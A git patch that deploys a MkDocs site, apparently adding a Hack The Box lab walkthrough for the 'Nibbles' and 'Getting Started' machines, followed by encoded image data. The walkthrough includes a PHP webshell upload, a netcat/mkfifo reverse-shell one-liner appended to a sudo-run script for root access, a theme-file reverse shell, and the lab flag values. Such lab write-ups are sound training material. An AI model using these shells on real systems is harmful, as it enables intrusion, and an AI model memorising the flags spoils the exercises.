From 1b2a7d5a6f7c9d0edb6403c293f4a423d60733fc Mon Sep 17 00:00:00 2001
From: <>
Date: Sat, 8 Jun 2024 16:30:45 +0000
Subject: [PATCH] Deployed ac64c069 with MkDocs version: 1.6.0

---
 cpts-labs/index.html      |  120 +++-
 img/htb-nibble_00.png     |  Bin 0 -> 46344 bytes
 img/htb-nibble_01.png     |  Bin 0 -> 85057 bytes
 reverse-shells/index.html |    6 +-
 search/search_index.json  |    2 +-
 sitemap.xml               | 1106 ++++++++++++++++++------------------
 sitemap.xml.gz            |  Bin 4702 -> 4703 bytes
 7 files changed, 667 insertions(+), 567 deletions(-)
 create mode 100644 img/htb-nibble_00.png
 create mode 100644 img/htb-nibble_01.png

diff --git a/cpts-labs/index.html b/cpts-labs/index.html
index 29ab99c1c4..5d667a551e 100644
--- a/cpts-labs/index.html
+++ b/cpts-labs/index.html
@@ -15865,14 +15901,82 @@

    Nibbles - Enumeration

    sudo nmap -sC -sV $ip
     

    Results: Apache 2.4.18


    Nibbles - Web Footprinting
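    Viewing the landing page source reveals the blog directory. A minimal sketch (the HTML comment is the hint this box leaves in its index page):

    curl -s http://$ip/ | grep -i nibble
    # <!-- /nibbleblog/ directory. Nothing interesting here! -->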

    Nibbles - Initial Foothold


    Gain a foothold on the target and submit the user.txt flag


    Enumerate resources

    ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$ip/nibbleblog/FUZZ -H "Host: $ip"

    dirb http://$ip/nibbleblog/
     

    Directory listing is enabled in several locations, and we can eventually browse to http://$ip/nibbleblog/content/private/users.xml.

    We can identify the user admin.
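    For example, fetching and pretty-printing it (xmllint is optional; plain curl works too):

    curl -s http://$ip/nibbleblog/content/private/users.xml | xmllint --format -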


    admin user


    We could also enumerate http://$ip/nibbleblog/admin.php

    Login credentials are admin:nibbles (the password can be guessed from the machine name).

    Go to the Plugins tab and locate the My Image plugin: http://$ip/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

    Upload a PHP reverse shell, then go to http://$IP/nibbleblog/content/private/plugins/my_image/ (the plugin saves the upload as image.php regardless of the original filename).
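    As a lighter-weight alternative to a full reverse shell, a minimal command-execution webshell also works. A sketch (shell.php and the cmd parameter are illustrative names):

    echo '<?php system($_REQUEST["cmd"]); ?>' > shell.php
    # upload shell.php via the My Image plugin, then run commands with:
    curl "http://$ip/nibbleblog/content/private/plugins/my_image/image.php?cmd=id"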


    Set a netcat listener

    nc -lnvp 1234

    Click on "image.php" and the listener will catch the reverse shell.
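    The shell we catch is not interactive. A common upgrade, assuming python3 is present on the target:

    python3 -c 'import pty; pty.spawn("/bin/bash")'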

    whoami
    # nibbler

    cat /home/nibbler/user.txt

    Results: 79c03865431abf47b90ef24b9695e148


    Nibbles - Privilege Escalation


    Escalate privileges and submit the root.txt flag.

    cd /home/nibbler

    sudo -l

    Results:

    Matching Defaults entries for nibbler on Nibbles:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User nibbler may run the following commands on Nibbles:
        (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

    The nibbler user can run the file /home/nibbler/personal/stuff/monitor.sh with root privileges. Since we have full control over that file, appending a reverse shell one-liner to the end of it and executing it with sudo should give us a shell back as the root user.

    unzip personal.zip
    strings /home/nibbler/personal/stuff/monitor.sh
    cd personal/stuff

    # Double quotes let $IPattacker (your attacking machine's IP) expand now, not when root runs the script
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPattacker 8443 >/tmp/f" | tee -a monitor.sh
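    Optionally verify the append before executing:

    tail -1 monitor.sh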
    +

    In the attacker machine, open a new netcat:

    nc -lnvp 8443

    Run monitor.sh with sudo

    sudo ./monitor.sh

    In the new netcat connection you are root.

    cat /root/root.txt

    Results: de5e5d6619862a8aa5b9b212314e0cdd


    Alternative way: Metasploit

    exploit/multi/http/nibbleblog_file_upload
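    A sketch of driving that module from msfconsole (it needs the admin credentials recovered earlier; option names as in recent Metasploit versions):

    msfconsole -q
    use exploit/multi/http/nibbleblog_file_upload
    set RHOSTS $ip
    set TARGETURI /nibbleblog
    set USERNAME admin
    set PASSWORD nibbles
    set LHOST tun0
    run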

    Knowledge Check


    Spawn the target, gain a foothold and submit the contents of the user.txt flag.

    sudo nmap -sC -sV $ip

    Go to http://$ip/robots.txt (it discloses the /admin path).


    Go to http://$ip/admin


    Enter admin:admin


    Go to Edit Theme: http://$ip/admin/theme-edit.php


    Add a pentestmonkey PHP reverse shell to the theme file and set a netcat listener on port 1234.
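    For example, starting from the copy Kali ships (the path may differ on other distros):

    cp /usr/share/webshells/php/php-reverse-shell.php shell.php
    # set $ip and $port inside shell.php to your tun0 IP and 1234, then paste its contents into the theme template
    nc -lnvp 1234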


    Add gettingstarted.htb to your hosts file.
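    For example:

    echo "$ip gettingstarted.htb" | sudo tee -a /etc/hosts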


    Open the blog and you will get a reverse shell

    cat /home/mrb3n/user.txt

    Results: 7002d65b149b0a4d19132a66feed21d8


    After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.
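    The remaining steps are not written up here. As a first check from the foothold shell, mirror the Nibbles escalation above and enumerate sudo rights:

    sudo -l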

    Last update: 2024-06-08
    Created: May 31, 2024 18:03:27
zN%PkTLJAx9FxsF%e}7dqwP%kWy-3_}2G=n6m8yz|kNSq_UDhKSR8sH&%r>+=ef+pE z#eLGQ^t%rp@S%reDEqUg{yRDmWGGQj-V0PMJX>w$)=itRE)G}oWds3X)!JtE2%1wa3Z8N5XDw zX2!xHNTCw@aoe4A1K;bkw-QY|`yg$n%igYi>hAKXJ+6pFfWVT7LrhuA>Qgn3a ziO^8uwgYN^S2;U8`(0&IgkYx2=Rp9CpX!Z3f=ZVzcnsHwx%=S3Yn*}z2zr%TjH;c_ z!$m2}fucTiC~16R3fLlAlFe}OdGBl40BgVJFG^?aL6A7KKTAV@(*#Ab~Kq`4}@<_B*eT`P;4pUg_+ z;j3$DHBcFoN0s-M{S}RSWf4pP=dJ%!gN>ucj3L#|9b4V6ginc3V{!;!TpBs6VEuu7 zFfTE11Mvq1inTRa)BgMSGXw4;?L43w?>GD-FE<0bc1sp=g=}t20UK%U+|#cT8#b^D zBqNSU@OO^5FGUH$9QmZA6UHiR*n)MIvr#c>hBC82ZV`dNwg8+!nDaG+zhGUv6VlMx zamJE>rDQs(JS#x4$HZjz@j1sdbLb)-KmJO02oXW?POO5~!l{IrKuHcazm!Not-dOI zGsg%$6a^VYNUuMyGZvKFbla+$99tb~zWg)OH&|~xnq&~1F-r$-R+G1rRbPAPb~Q_7 zF;VU0p|h?CmgA^n+o9?}Fy)TRrl(&W`m^G_EJ1EVgIevOX*bpMNnXG6J2{$CfG4B0 zF$u{S2nQ!PNM(RQMi<)jTK!x&YrbPp;E=Bk+yKs>z`#5%jrq{(OL}=9;FhJPrXonF zxyLMvNZ4$g$3utGA`JANOF-eST~nz9SFCu$0ipeXWKI-^wpTb57FPZKJ-Om8m3Ml8MzEZL|Agr| zMv;_WvTJ9|p3NR;jXH#O2yA#>f9qk|36Z>=Fd&*Tvy;a1=M4DbrS(_PZxPe?&ny?_ zk1)y*?`bm2mjS%`fS``Jyb(e0=&8R|)J#YZ$jbxYtKnHPFXAhu$hHtEnlUD$JvLJvX;s z?KVL%$E~fDpmE|&Wj_|ed)TD1_YRnEVX@NIR!=cVQ&Y3XAea-753lXj$@7LHo>nDq zsvwwF1TWhHkHHJHtL`Sq2Qpv{>BPfS(i_BIdh%(oZ?_rv!OjZgPm~H{yl-&oL`E*B zA(%GJhmI0RK0LdZKKTatfk%%Y4@sEyq$>~xYEb_dyYWvS%sHW9m%(~Qdxf|sXoi-a zubgbj**vP<`kCb-MYVpdpUTR@FI`%^h-GRuCnebdv zT^Wb!hE5<()P7VnDO$R^o@jhH3Hb=rY?Lodg@!GD^!PE_CZmlTN2{HpWn)VEuJjoY z4@{nfh3FYY&bz!MAt=!Im3G|_{}IS>C^%RK(IQ(5CuhTvmGow^bR_tY#>4by?zMqlE6DEXaR}vRjcEbcj*KGd$%>Lb@=37}!($Kg9%T}yF z1=+>H4$O%yhL*Ue-%4f#s?GQb~Y3~&AXbH+IjA4&~X9#tK4 z{`}pH41Ho`c$i`lB_&JTtXpDqDU&(6*-*&};OgiadLH{8-fwzaf@|ekRs#1LgjQ0Y zw?DCizrC7WtNq?r+6)Au9l5js z+F{y3HwAf{J%qX~U{8(xcp_GG4jZ=g9hFcuzC6c1Lrzj(80a@~%LnvDRGTb>j_un8 z$=9M4?7_cObp6`s<}JBl5Bh@EV}7py<&%w6gJ;c|BS9OdxZJ=!;1e%R9U+3{yR6l= zJz71TvjhZ(CC+r2hxhMi4R_D#V<0xoz`zaNAX`+HVPWEhPVK!KhSna*3h9!fIe^m6dfvJ|C3i-R3WM z)5%nEqs*S}B74g*D0HE25o(-k!p_f|1b zB4(+~IYq^;y;+SL+}7Z>051?i4tU9F<53^b#w#f*GPONWcEZl?zBX=NdOIwB(B2)$ zArKi}gcJQ3BWUK$i)AEB#C|1jkB0It>;n{~fSnDsOTF~cY&AINy>fR*X4vF*`D2cx zK8n!iI}Oj2OJvOUo8{ByAEp&*JZR0pp+RrQzU$@vh;`;9-B$rO>2&L%C8rvexOK~3 zOr#YmOnj0QOk@35!g4nD2*GFaD6A679r@$T(gzr2bA zebmJF88*}SP!tE@1RzBU+oAWnFfj!LX^OMUKgfHhG`=~`nMzwrw&!5Pr&_J>N}QZ% zMk@TB6mB0snOnt`^v?8Yu<>LoGU33b6xs9!BSJ34=(MX+gGSySu2zynUIqILM+Q{{4bIHP*k+Xq97T7 zAvIO5P2y*l14OJZSisl@dROMtq;(-Ww&bJVeU#w5c#Uozz^-X&JDAA>sG%p1v(b5! 
z@E|dH>z`+Otg|Irl0#9aPwTS>&6xvNO7ck;h0Pq_)PWp(Nj+Wy=JnFYEuPVd`EP?& z+{KU0GB&H(6fZqV8JTc2B>Rv!^=#xlC`zAhK8QC@5ExkT)#&Z{4@tNT1x?PXvY!@*S@9!EG* z*RBDrtsX&1>o8RgSgFI(n4iK$aT zv;gQ@5!oU3tZM{`$U0(NF?7%7R}nJ8;2y4h^Jbz8?Bm5&FboDy3rhyns5ZOaYR-xo z2CMEodlpZNOMQp@^qpsHSG5rOq20q3i&a3i=q37gyUp-C>MpH9rm+%E^}trccj7}^ z4RCtQP_@EqDm`ET%GdHn9YtISn>Jmmd3`-XGP3Exa5}7)bS`8vv(HBCm-nt2k$ULR zA=V|}bJ-(P2y+-o=t4>Tj7d(57B0j%Gfqcd9KV^6K$-yI z(G2#0;bU%8@QkzkcGgzFrHiiWXc;M^4Zba-KS1b%+K7tQc>qyaj8%HKzP02u?JZ|L z-g~wZHWB^3jhS&Z;SSTFmB}-ucE%6NJ4ye*Eu!h-M=0uQbMg&@aD+y!u2v^z2Y*`0 z_^fEb{sE%|i?Z_e?tU~n1~!C+2}&j!IZ1ttsTDqMY-2!klKRFfW1xs1tN^@)jq$rX z>vc>jhII;HHU^GW5bl-^=M)$9S-soB?a?#D9BH%ndAmHVnfmT7C(XT_oReA`6sa0H zp^YN3q+8FN`5p)YSO5>DT3~kOCSp^BuZDyOQ`JLgd>JwRS&%i~J1p#ov9WR*W5k4^ zxcnJWZ>VN>_g}~_?^?aT?Klt$;#++46G3*+W8F+lq#o_kr3*K?qPher|6YH8;@J8H zW?PZwQpCMg?Xn ze^m>a2eCnP*Zu_G8)(J?v->>ksc`o6>5Y^^JQ?mfCmZXRKGTA|?$s;7a7*8QCxkZF z|AgX?wfz-J+Ecr752!vf;}iso02f24O3wpUr~K>-Ee%hMOc(|{`1<)Vy`%j0H8BOu zH@Hruq*#b?z-Qi%z$#mtOWRP~OgyQU^j$g~VP@iY;;Sh8Q=2{v?;U_wZ!ncYaR0+b zfY{o&A4?W5ac;WLArFYUl^}>nQ%EPlVE@$`WOd)(z5Wwa+;lLeO|w@wUa~e`HUCZQ-1@A#G>6zken70(jw$mCGL8lnB#- z5DXTK?1&xOjNP36gOYcH)nvB@4OP`uER_*b!zt?o{`Y@jjI;eB_K%SkPpTZW{{t0C zw~#3(E?@pE2=*%~d{>VOGVPW7GOK*Yeg?CFH*tSc8!EcjDrMc~iO|F*g9U@s5TFxr z`SN594bEf)QLz_flx>+)R{-*y(5+}_VkSfe`OWpce z=J*3J)dKQ%;ii~}1-5eV_;JDred^0y)GOMZ0dI7p%z$kHKjCE{Hj(O>a&oAus8YlAjskqb_}{8hXcuuOOuGH+FOw+XP2udva+ z!uS+odE(aln?*rRV{-UbTgx*NY&5lfj!@UK#Q}u!#l`Wv6@C6iwy#tJDbUuC7fn!%-K%&>YSG;+vau=q~^&&Y!IrR0l*3BZz=} zArZ_V2MkZepouUQQ%;S?D5WVa!%F=uKD7ay4Iep@B*B)2U3W%MLlHC7qiJc7=P`t~ z@DOke^cQ&i!Iggc__UL|#A9K|JuYhUMmYK48KvY-w)XfB4Dm}t)7nJxnGfFcw7l@^ zgNa0$4R=dl0>{v}(ZE7$)@p~BavYQL*s*hGHblymJ)Sw*+rFIGz5Ct_l^8Ywzz~jV zYBSlIs|g8nX3ysA2avp3Bel4!&mFA)v;A9#5m5s`$*zSsRDh)ZjdwSt|LcN;|7#d1ldo?2dt3hX$2EbS{~wUK|DSQlK`2UST}nTm zLh7_*#}0|y7}#^<>~dSH*Mqq|qqX^ZJOuh4GhWL23ix7p0Ueibs$qF;;g9z{ZPwYZ ztIytzx>`&fFqi-I4sFo1{cS5If!rZ?^R(^Nwiz^^6SaCv?(`U2PH_ZtZI6mN{C7NY z)_iD1_+b7TPTzx-IVTQBe^yy08zj@-|lPA#&0auT@KT8Wnk)m6wdkig-?elK^=(HA)g_U^sUQwO{NMk4TXrK6(< zZ5#cYH!#csh9hIGC2N=M`o_jc{yO)Tvkx4Q#2~ee!-&^ZRNQH-!fY|h;AzvRrxK&0 zt}d`iTB*n|A@4k4&|z&bb}F87;&sO|Knf8{2;_q}9|og_qsfNjzY1zTF68sX^F)Ia0|i284Z&F zg2HFSf53+)*Nrj(K(Eg~*h+v20E2TTCm{%UYap!tqLu}Q9T1S4*K6d9k`guRK_Kdc zAABmj9?hr^1%>p|Qe9C`}^DELyx3?cZYAY*ediDoW0#7#ad1NJ!d?R!t!Hrq2I5sVc0kqHrtQfuxMp~CP;Qm!q}niM&V3GL~gJ~I|H5g3f30>;4E2{3}MzB z=P3g1-5O^O^D*#0?9`)dq zetswMYjJSc%5eJ8+vkR4I&j&pI5_1?O7Zx9t4!T=sNXAQsh>fIZKfJ5}axd`9z z^#6An*>?sBU4tMP2Q$aGY|b$6DH0iXwI4$$O=6xm&qbteapS7~m81s8WVQxvzIp}* zTy))kP{adlMGDI;X$jaPlq=jAfG*ew7Cj0|Bo&Nvc>m^&(04nv9m*hx)OHgv`|Z@Z zGtTWKyJSm-4d3I2EIk6OONR-f}hs8hUa@66JwKSrJT~fs5`ggKXu1niIF`&D*!5 z4!Cd-2)=O`Ae2q%sUJiSfE%W%jO1WddiL)u5zHj;Dz~mR>EHheF$GqxaXQQHe~MQg zDiwV8CLPx?eTU7a(Vh$8l7J(8sE?>Rz?4rmTY#(miyh&B7k7I34 z&iXO>HQ#d`{?P)UeFlXHL>57;hso4^2!q2N&_akwbxPEZp>uh&nR28>hxD!ufO~JT=zqvb zUjZ3MCoVM8AbO$VG}F98oCGWYvM0?JBCx7zVnRags~hn2V+M8^n`mvICH`=`yjEvu zK!^%R8hD`kl`-AKCELyL5K-=BN58$_ak>Ss)R%26)#)p(_*YuH{>NVL@FsVcfY+4> z-l-mA_U?tdsJ{%zCwP#g2RD(=)CXR%KT9LUng`>D&W;>mryD68%z=Sa(W{twU8>12 zJ7um+ERLWVUN^GJ8j;_ng41jaLIDldsa^30b~y}G`kET7P3#5oJsP$6l6CmWHaze! zR2xm0K&*tg4ne4BACfQ($*k9lG}mBBnzeW}xR`7{{7Jhfbb3bFiqA#|d@_;J~jO8B7_!;i;H!%vnjj1)0wv+~tcFbvE_g1NBa0 zSG8Oks5jg+#n)Wi+=SINW{m2I?v6Cb>&iF>h1?9?aG>Kd>0v9b8y(_ z3}ZnjpmLWk(PTH+4d1=%PilfAp3w1wYk=t>DLpCF(ZUpVTAYXADNA1}J3LGiH%+T< zCDj3Jqn^w~2L7c&eE zAje=@P3;WVOoq~TXYae2^^4ha^#A)k`0o&np0}#zjT?)tq_#~Izh(? zH+uQ4CM$#L0vHSVBS(o<9^l0C%Vq zOXp6#HjTGnYMx`#OUn&WZ6vQMD?6*IzIyxi$cYm#3JYn_k!*jbO4*LlMh=d*Hf=kieIW7d?NYn063k9LjQwtbg_6C! 
zEVuuxBa1*AiI;LfKR-!7R(f$DLp#obPdgH}4XMRdEqSMfVd3HGBPZAI zn>9us+xvpbC8U$+JR*I&PahY!GhlbNPUnxWpyz;7ZI)rfOxsu5-{38s`r6SyfLRJg zOf=rahlgi)bd#Z;y?7Bpj};03!xr9qO zm`S)+r>t z{D;xLR_bRHo%#4NTG+hn*Vl>EH|S(src18`luJ)}Bxl2JVIm^w0mT>)nW0)+_s2K~ zlSY@93k@b^Wi_Y|`AfV;SPdX1xu4{h9-qLPhuQC6#Wy(1o~k9@l6Qh!=j*AX4umtvrY`l z0-C-FroFEd0SwKtb~GyG#ft}w&EtSasCePR5LpD7K8u~DM+k*dAn%NdieiMfFpQK> zVsUU_L&b;Z6crS7`;%s1E*BvQL6=}}isNGBoDCP_0+zBi5ndrz_M#TLeO)TTX`5j@ z5P2|leDToY(DiHC+-x0UJQ5LPm=am&@t+#)?D$ro0PC|dv~FCzS^_n|t$_98)(Xi) z>*lvS-~tmI3S~4q+q1vHm|Y>=@91tWdiHG7`cc(0@^0RoSD-X}PnDVRZMl^wzdCi= zPJ)AhMdR1>rl0RqU~0_XJ2qUFZ%*#6CjC7Rx3pcmgwVkOHJx$=q^({CalS}tv)ynJ zyim15|FWde&b`wWoYYhriIyndc=V`-T(wpJJ)8AS zFZ)q^voffvAzyfiVXD)2p@3Mso0*K5QDaF-$Yr&!PY(6_ODqMv$ICk{ZM*%p`jDgD z0$1Ty9bdGC8;VzsV5!zJTTd|RKNpdygYX#Iv@7Y=%k)7#Ckxso;X87omS z$w_ac?EAVF68yB;{zBO}JLz+;L(z&!h73>B*`52LEc?IDfPbh%?-p5ZKHk=*FVeB= zi;fCv+?LtM9QN(xUs9Tt4VQ5uUeQXvG{D#x6E9u}n(o~jNMq6d{l6z)_>RW}zzCIM zePAQ$cI)4NTa$5haSkhk3<={tp|6YGfmg)1tjQ&E-{ZS?{P>Ct+tOib_fps4W?E&@ z`_4ovf7)F(LM$cc?EXMs#d3Q{k?LQoZCY9D4Js4)&g-yVMP0p|7n=6U%CO-cYb?4{ z)92Q@O;7yxaiH1nBakHc76Ez;*G%nnShS@^{D(!PXsjFy3f3#~65wQiClY2wjwjI*@CO6on}uU7uNFp)!w zZyqN&)oEyGP!u0Jazt6wisQ(rA6+GEZK;SI3kEO=jLJqA4_u2lcW37iF#_i6#qVe$ zC&v{UmrNhiBN-->*|@r@zxdPEY+Um~(3Lq8>|UIjO>+TDguuj=2<-R-M!T~VGQTSB zY$H)sQAxpK2d?T;&x5B7>$!J$^y$0|_Xb*3jc${@NRLKVxCiCc0 zv6NjCXpzowbnzmZ#V*04$;WX;s-Mm=KOA9{bRVS^TE7wXQ6kPBJ|0qARse7T?w0FW zLm1sYiX-USc}u=zqDH#H*_3}HvhAcc)5KB`FRHwXZV$D)-Ukz@O~ti;WyeMPW~>uY;ujYu^Bwm& zBYC4%3rp}IKZ32nGbzJ^Ve}BzFJGd~Htye_;q{za%#9~GhgZgQ8Ip`tz1@XXsE{|1~i`hrbnbbS0pU5=@Y(QktKL=H33ty zgwX&68`@=EyOxNM?c~WSaGMcZG$q=@HfDDjw&HVq)0=*QYUC0=CO<$CmJFGO0As`m z15V(yG^T8fe^o9j!mDNL*2dbnrel*%?Wc{4Dyw1lhVrGZ3Zg+<^}P#mfi zZgH8G9~iJ~c}|l9Kq#atnSLzUEzfisiP7fGNP#$SJGYZxE2U#%hK;K+hD8cdm>w0s@LCp*;VqpShrt=k{ZFXd_}3Ds9{=mJ)Rs zX=-SQ>)KqvMgl|rJ5wFh{0jpD%r@I)jb1?|J9B0k<91Df;gQG3 zhurYwzKt9;3fi1R$Hl8p`r7(@7TfMsPpH}b(2xU_|9Y118Q-kg9cnYf1a(lfa8Mz zLZ85mygbZ^bgREdVnLgE)SK{+(o{o7#}b#Y$PKt8cGz}@nR_&Ock0sR&tARQ(Ib~g zOMAwMs{gaqn$y>B3TmIw2EDca-f`Vw{qWDJ|H~cMTe?3N?IRNfKi{0^1yKGLmk?+d0nei{+GDy<8-u^TCt-^qdKNA;dSQ#EcQyc~?$1#&`GR{0GneV{u(i>>)ZT zD17_=F1dQcR-lT1@3F25Exy(;sdbiRZFyzow^PckhSO>I5fT399NngYd@qg}#2gT_ zev21(T@o{(>Z>bI_xSMxQC)-f5NRMoo6NtuDKaF8p`q2)-;TDeNn+uBsi|Smc-Os? z2S)|ZdD#*Ys|hcd9IwTM+wBtY-3z~iN;T|m? 
zEmyVk$A7ZupT_*3&!Yc7cVho7NC0ba}8&Px8MboFxPuHDo zf8AOOee~n?M{n`JB}R-;AePk9DNwowf1RA15fdhSNyZ+v zIafE`w#$uakVgD7nEg-NYl;g*Q)>PoD`UY3{FBbG*TDm^y5MJFd($s;Yrc{umzE2; z406ixD<7-cK&?qKNiB{)YXf_R>tp=~2PtIya69Q?4Z@sjO=?JGj%c1ao@4Cn-Wc_I zRIE}sRcJ_j@Id=>G&@2d)kKno3m3ABEz<&7)Cc#a?I|NxjR(sY`Y1!AEzm>TMM-a|A z5EOL&V#)=3agyN!KA6#|7cKX-Yl@oGajg`+tv0h=yizEY1wp(|-KYGvLx#%9g;A@V^FJ8PL z`d~>ijXpd4KyYBxfW^dXj#m)7_EE!IgsJZJHeCC3W)zeIJrW(` z0)PuiNom3p)Thn<%F*QP)_N0ZPg(^rk3H{@!GrUVys)$o32=0=y=+7^;j?^wL9I85 zyBz6@S@Wrslvxh)qcA+qtKapt6TasFX)A3UoF) zGY+koyw&2&)|g`bU4NJn0!YK?CEj7Sb^CVyf$7RRpK7Zr5ENNg>pi(2>uq9$f}IX) z4rY>VVW@6!aJp5ub94e(2<^uL8gyw9Ar8q7;Q3uor#j7AZX5rGJOg1Qwbqa& z-o!Zq3YYi%+@kJ{ds$AwTlkg&{X_c*og!F2c9)96U4xgNZ|n@Q4jc=T3$}e3R4VjS zs2RSZq<@rTfg!VdMBjSdVuf zKCny}^~v@_hRa;+_R?Hd5W?sC_tO}Qxa%4ts-%ao0$^)ucE~|%&(Kx7gzOxe*GFcR z_@B41uz(F|1dMh7B`<#C@>wMt( zbIWu`tAELu;Mr^Rfnx`z+N#dZSDx$SHgH^CLt{X&MQu!eYK3yv=fH+R<*Qzl4@+Kr z@b&F?mv%xwMBd~S0t!4%VntCyDMud*hD3$eJ_O)PNJBIL6qORPGok=9JuZ>MvKU2g zs{*)*Z@A&XG!JmdT1foS-1Vs@HogOjcTV31 zdIOY%=oXg&0zNwJnZRa= z0zk#Xrw0P5{4w`$TsD15?B&lhU?7}Sn!b0XW5EYaOH=y3n3yS}M%~;QYg+_gdYKKn zu+SgChSMY7d@=d)tgw?@)|U@YU0*daUmo;;-=F3E+|#?ABh0}gqkY1clu3Moi2fGs zOij0p(gSC|bT_1d8;5K*7nSQLOcf-uoR=8!F5x)Xd|W|r#^xLhE;d$>=#jwkkBXaC zP3d~Ot-M^p5fT_UhqlRodgDNpm^52`4TpnY^(z#wA?U?}&e=o5bKKqr8$dERUP;2$4M0WI9>smVx4NW{$v z1w)1?OG&R`R!FH)(~c@n%D++F`Tl@^v;a4DQw_3_a=%9RdrS0@MI`Uh5@a33c`jgy zZXb&{5)k{v10D9Xjy=pb>5e>ZXE!+#BU-iKOA$j!?aAV2%-Dz84isW;Yl}ExEOlsT zD1VPcY|sOejx6{9FnQgcl@E@`aC8sIkIM5xZ*%?HwP#mWFF4w4B?%CS7_tW-n+Xgd-%*=Zv_h&}XbR0c6zK@(Z{E7~*yjvm z(|;zMa8JMEl_D4{ZryqsDV5L`2S#x*=S5HL@Ei~0D_N@3Qq_0mh6Y88o~FzR&plEA zVg%#Q+}O@UrFcL+f98H81|~?%i&PjUC}-x($$41~5zILDIWuSK_8(jMHOI3*fEFkV z(^TwrmeUNiL0rSy11@_1^sEySfJ;h>{4N>%%i)>c@QqgP#&RJOKM3kF?V(~HD(LoI z1`0ax)mu46@B*TVjfu9KGzZ_kb`A7^e56a~&a2KW;;k~&{iV1SIAUjoy3wOUqdbIc zNQhkY@7-nGjRcSySp<FV%z;XHCwp~qQ|=BM=60+qO92MJwU7mv@LkVsad!OK5t_Bqe- zEb&BAwfdf5(M2%7@-%mCeSJOt=sZH`Nh4puWQ6t4?p*D(Bf~@Rsjut*;}}8*g*gW+ zVyn^eRq8w3RdC9Ldj%;#gwri>!8;NcWcVKo6V}JmOnD78D$bgDLybt3ToyWeV%fla z3$4_iKCEc)4>Fca%Z?lqc*^gOZ4>kD;5{7Y=bqUphB*SJp>=TpVk2uH!ox^4u+J}v zOe3hl#o^|pYwyKy76hqMdpkS%K6Bp~2yiCC7xF<-lgZMz_b`naIaK=-kF=>`DhWU& zasV`0oU^OYs|t5=GTJv18h)ta!gUAD6Z`k~hqM2FQnsvj5J7^Ud=4r$Z5l3CQiDw} z0Sx%8L03Qr!`TH-^((5QA|hb9Cy`^5{x}q<*Q3lJvN9Af8sy@#DNsIDjP@XAypBy^ z_=?e_$rS_viYr(UhS`+y9|Z}(E@e3cUnU7@N-O7=O9j`;2LmoqPO*fYRJ z?0ec@XC%Qz1mpXLw<#?@mKeDaD<9_Qkq3h`XsN3|Omfm$VOek*tU|C`z^Iznwr#`P zR$g80wJd!FdM`wa-c?v8B|7!Pd4#XUZWUYth*{sy_HMsdIFnm<3?oURV;DN?By1w; z9BMdnSvB(o-lEgw|HmJ)L_ysvhUqf)PB5<+Vi%4dgit7S=l~#i3jQS~Pari{eXE(B z@qC^N9k({>(W>!IPouRRn02eabwvE*&7_wK>WW_E?r@JM`o0pBzEeR`dc9YQtn$?CVK>;w_Q6Xw+`y}*MUqtp3OE`f4g(lc?g zBig^Zzw3Hu%c zoyuzoRH&NR@uP9XZ+pV@>5T}NSCnw}JHgFE7O=hfCj~;sJWWB%hqk$s7N~? 
zyp4_3($;3!)^2|GxLeu=F|_O=PHa-$Y3Ka*1taybG>plkLzO0Y!Mqk>5|U)LAv<(O z-)U~aiuaP$H8lR-TBAk$J>Ys5uTms4s4v1^w7iq!+hF}(lh+Ip_5a* zRyo{izqhp{v2pfX@z0*EEAsYt>u64};y9oHga(Y>wG00%UUhHpzcYWnayJ9 z`u7}2xNV@`0s=67zJ;dtX#t+(@JlrJqweE*%#{~PIp`}2N@G*gq~LcI$1|Cog1_;F z3oAHz32ENrSPDzJl`=KKJNhO07IoW_A=!j&#->H>+zC-i3pWavNb$@$b4D1rBre2B zXxN&aY-dE zFX+~~ZH*$yheg@H+?r~ci@uecOLH3svLM&yVUgurMq6tU7fc`kPk0d5abUM@R-;B8 z0XAdMC7Vgu%qzQI+Qn%|)|L?N%Fk$Z?)><)`i8ALcjDa-%#31$u_uLlPBl??qE<|D zjmh(ZSrv@=$PV~XO0qHf<0eo3i~X3H)$5SF)A`qqZLhRyj>z{&zgvY5@5RbvGRY&G zeXV$!PiD|);u{t{GYc<5m5WC}efxpMZlP{2@>0v;3%z6XOLoTx@y&hJL<1RkTr z_BO)>pBamdAUI5IY5hLO9v{`d-P1}isy{jH3RzCIwG)m>J zlZ|7sTofkAxCMNpJZ0e<1KXoyhoW^Zia$PAs?bE$Vcb(WtKRe<^16F!)`$y}nGZzw z5#a`Jm*4)77jq5>j;bE_0##~iYb(d?;BI1da%}(p)i*qm6R&G*@18bq0{tsArSUJw zEy$fJ#-_&fk&rHmwsv1V*a^P9!uUGmLdI0Z)V7O}t|Gu8%%T0u^)SX+(eLbvAys>{ zdsmnxqlWQMDm;x6f9{=k98V6(^M-L>K%8*=V=%Hk=JB6Bjr#T#RI?O_m0nczGy>vU z!WF=Jf^`A@s%mNdB-P<+AAA}yM)Wv!u8PCALfbgoiHh^8X71R&U7^PLOWdNMVc$#1 zXB8g2e32g9#0{IPI3{32zJ5XJsmzR`sc#7wt>XNDw%MN;Ij%9f=F1+Lif+7q^w_b6<8yAEh?_glI1lrYqLRPA6peY6-fI9?_9UY`X*yY`h`z{r`qFKj`IkBMLr+E?1Z1Ze?WDBu-_J9O&4bRE_%( zg&{&DCUkS=U{Uhs(N{yIZ(tEk{y( z%;0G!84UN6b<1MsL`c7MDUh}to{a62eT&VpF)d7-1S0it%!q>32x!5)PoP>w>&vLo z(1uTd9DYlea*!X+9m~TO5MP|@^Vg#wUrBW2Xg964qX`QzW$LM!YyD=dQ6ER3D;Rbp ztlwUD#KOx+Jt<;AsnC&=`+xpzM(sF{SLv%#$?__4*PvaEHpb^gxm9t=60i1qPgl)u zI#@Z@Tl@y}+xtMpceBh#KFe_5sj3|#6|Kpj83mwu32;(P4YcWsHM`^0@bxkhJgn^B zwm+!SZo2sJ#9$5mZ=XaXhL}~)pXq&a(f5kv#sxzzZ$p6>zr6PI$ZlFm`d453TdoXF zr<669^0;CaE4s%wo-}v)^A}@Aa7>~f%?aWVkFg5;^x~ypA zl?wYE*O{obM~tCVC;Ss4A~2@!-T&QV(;6I>JFHJ2YV4sF3pE^4$kVo1n%wlXm0Z>F z&Rx1}>1yg&U_AkCG_iyR!d>)l#BaedU!~UZu4Oun=wM5UD(XxazI#IrmjLPuHy}N# 